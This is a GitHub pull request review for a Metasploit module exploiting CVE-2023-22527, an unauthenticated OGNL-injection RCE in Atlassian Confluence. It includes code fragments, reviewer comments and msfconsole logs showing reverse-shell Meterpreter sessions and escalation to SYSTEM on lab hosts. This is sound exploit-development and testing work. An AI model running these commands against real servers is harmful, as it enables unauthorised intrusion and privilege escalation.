New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add exploit for CVE-2023-22527 (Confluence RCE) #18734
Add exploit for CVE-2023-22527 (Confluence RCE) #18734
Conversation
modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb
Outdated
Show resolved
Hide resolved
}, | ||
'Notes' => { | ||
'Stability' => [CRASH_SAFE], | ||
'Reliability' => [REPEATABLE_SESSION], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can the tester keep an eye out for stability when running this multiple times.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great module @zeroSteiner, one minor suggestion, testing was as expected on both Unix and Windows. I reran the module on each OS a couple times and the stability seemed fine to me.
Windows Command
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 1
target => 1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
payload => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (200774 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:49939) at 2024-01-25 12:57:40 -0500
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer : WIN-2EEL7BRDUD8
OS : Windows Server 2022 (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Unix Command
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 0
target => 0
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (24772 bytes) to 172.16.199.1
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:63558) at 2024-01-25 13:27:28 -0500
meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer : 6bb0a19104ea
OS : Linux 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec 6 17:14:50 UTC 2023
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
end | ||
|
||
unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win') | ||
fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I hastily ran the module without switching to the appropriate target and appreciated the detail in this error message.
[-] Exploit aborted due to failure: no-target: The target platform 'Windows Server 2022' is incompatible with 'Unix Command'
|
||
def check | ||
confluence_version = get_confluence_version | ||
return CheckCode::Unknown unless confluence_version |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
return CheckCode::Unknown unless confluence_version | |
return CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version |
Testing the
|
Release NotesThis adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account |
This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account. On Windows the service account is NT AUTHORITY\NETWORK SERVICE which can be trivially escalated to NT AUTHORITY\SYSTEM using the RPCSS namedpipe impersonation technique added in #14030 (
getsystem -t 4
).Closes #18731
Verification
use exploit/multi/http/atlassian_confluence_rce_cve_2023_22527
RHOSTS
,PAYLOAD
and payload-related optionsDemo